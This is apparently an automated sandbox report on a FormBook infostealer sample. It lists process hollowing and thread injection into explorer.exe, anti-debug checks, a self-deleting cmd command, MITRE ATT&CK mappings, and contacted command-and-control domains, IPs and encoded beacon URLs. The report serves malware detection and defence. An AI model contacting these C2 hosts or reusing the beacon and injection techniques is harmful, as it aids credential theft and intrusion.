          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3C182 mov eax, dword ptr fs:[00000030h]7_2_04F3C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A185 mov eax, dword ptr fs:[00000030h]7_2_04F4A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B171 mov eax, dword ptr fs:[00000030h]7_2_04F1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B171 mov eax, dword ptr fs:[00000030h]7_2_04F1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1C962 mov eax, dword ptr fs:[00000030h]7_2_04F1C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3B944 mov eax, dword ptr fs:[00000030h]7_2_04F3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3B944 mov eax, dword ptr fs:[00000030h]7_2_04F3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4513A mov eax, dword ptr fs:[00000030h]7_2_04F4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4513A mov eax, dword ptr fs:[00000030h]7_2_04F4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov ecx, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19100 mov eax, dword ptr fs:[00000030h]7_2_04F19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19100 mov eax, dword ptr fs:[00000030h]7_2_04F19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19100 mov eax, dword ptr fs:[00000030h]7_2_04F19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42AE4 mov eax, dword ptr fs:[00000030h]7_2_04F42AE4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42ACB mov eax, dword ptr fs:[00000030h]7_2_04F42ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2AAB0 mov eax, dword ptr fs:[00000030h]7_2_04F2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2AAB0 mov eax, dword ptr fs:[00000030h]7_2_04F2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4FAB0 mov eax, dword ptr fs:[00000030h]7_2_04F4FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4D294 mov eax, dword ptr fs:[00000030h]7_2_04F4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4D294 mov eax, dword ptr fs:[00000030h]7_2_04F4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5927A mov eax, dword ptr fs:[00000030h]7_2_04F5927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCB260 mov eax, dword ptr fs:[00000030h]7_2_04FCB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCB260 mov eax, dword ptr fs:[00000030h]7_2_04FCB260
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.223.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.88.34.80 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.236 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 170.178.168.203 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeSection loaded: unknown target: C:\Users\user\Desktop\Nz7NA3F7z7.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 13E0000Jump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.225318528.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 361772 Sample: Nz7NA3F7z7.exe Startdate: 03/03/2021 Architecture: WINDOWS Score: 100 32 www.myfeezinc.com 2->32 34 www.explorerthecity.com 2->34 36 www.usopencoverage.com 2->36 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 4 other signatures 2->52 11 Nz7NA3F7z7.exe 11 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\eeysn2cunceh9.dll, PE32 11->30 dropped 62 Detected unpacking (changes PE section rights) 11->62 64 Maps a DLL or memory area into another process 11->64 66 Tries to detect virtualization through RDTSC time measurements 11->66 15 Nz7NA3F7z7.exe 11->15         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 18 explorer.exe 15->18 injected process9 dnsIp10 38 www.myfeezinc.com 170.178.168.203, 49741, 80 ST-BGPUS United States 18->38 40 www.glowtheblog.com 217.160.0.236, 49740, 80 ONEANDONE-ASBrauerstrasse48DE Germany 18->40 42 8 other IPs or domains 18->42 54 System process connects to network (likely due to code injection or exploit) 18->54 22 colorcpl.exe 12 18->22         started        signatures11 process12 dnsIp13 44 www.856380692.xyz 22->44 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand
          SourceDetectionScannerLabelLink
          Nz7NA3F7z7.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll100%Joe Sandbox ML
          SourceDetectionScannerLabelLinkDownload
          1.1.Nz7NA3F7z7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Nz7NA3F7z7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.Nz7NA3F7z7.exe.22f0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.Nz7NA3F7z7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.Nz7NA3F7z7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.colorcpl.exe.5427960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.Nz7NA3F7z7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.colorcpl.exe.11225c8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.myfeezinc.com/nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.856380692.xyz/nsag/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://www.123-reg-new-domain.co.uk/iframe.html0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.worldsourcecloud.com/nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.wholesalerbargains.com/nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk0%Avira URL Cloudsafe
          http://www.tencenttexts.com/nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL0%Avira URL Cloudsafe

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.glowtheblog.com
          217.160.0.236
          truetrue
            unknown
            tencenttexts.com
            184.168.131.241
            truetrue
              unknown
              www.explorerthecity.com
              91.195.240.94
              truetrue
                unknown
                wholesalerbargains.com
                34.102.136.180
                truetrue
                  unknown
                  www.856380692.xyz
                  103.88.34.80
                  truetrue
                    unknown
                    www.myfeezinc.com
                    170.178.168.203
                    truetrue
                      unknown
                      www.usopencoverage.com
                      94.136.40.51
                      truefalse
                        unknown
                        www.worldsourcecloud.com
                        172.67.223.7
                        truetrue
                          unknown
                          www.evoslancete.com
                          unknown
                          unknowntrue
                            unknown
                            www.tencenttexts.com
                            unknown
                            unknowntrue
                              unknown
                              www.clericallyco.com
                              unknown
                              unknowntrue
                                unknown
                                www.wholesalerbargains.com
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.myfeezinc.com/nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBRtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  www.856380692.xyz/nsag/true
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.worldsourcecloud.com/nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfBtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.wholesalerbargains.com/nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dktrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tencenttexts.com/nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quLtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.tiro.comexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrorNz7NA3F7z7.exefalse
                                                high
                                                http://www.goodfont.co.krexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.carterandcone.comlexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.typography.netDexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://fontfabrik.comexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://nsis.sf.net/NSIS_ErrorNz7NA3F7z7.exefalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.123-reg-new-domain.co.uk/iframe.htmlcolorcpl.exe, 00000007.00000002.488303351.00000000055A2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fonts.comexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.sandoll.co.krexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sakkal.comexplorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          172.67.223.7
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUStrue
                                                          103.88.34.80
                                                          unknownChina
                                                          136188CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvincetrue
                                                          217.160.0.236
                                                          unknownGermany
                                                          8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                          34.102.136.180
                                                          unknownUnited States
                                                          15169GOOGLEUStrue
                                                          170.178.168.203
                                                          unknownUnited States
                                                          46844ST-BGPUStrue
                                                          184.168.131.241
                                                          unknownUnited States
                                                          26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                          General Information

                                                          Joe Sandbox Version:31.0.0 Emerald
                                                          Analysis ID:361772
                                                          Start date:03.03.2021
                                                          Start time:08:06:16
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 9m 7s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
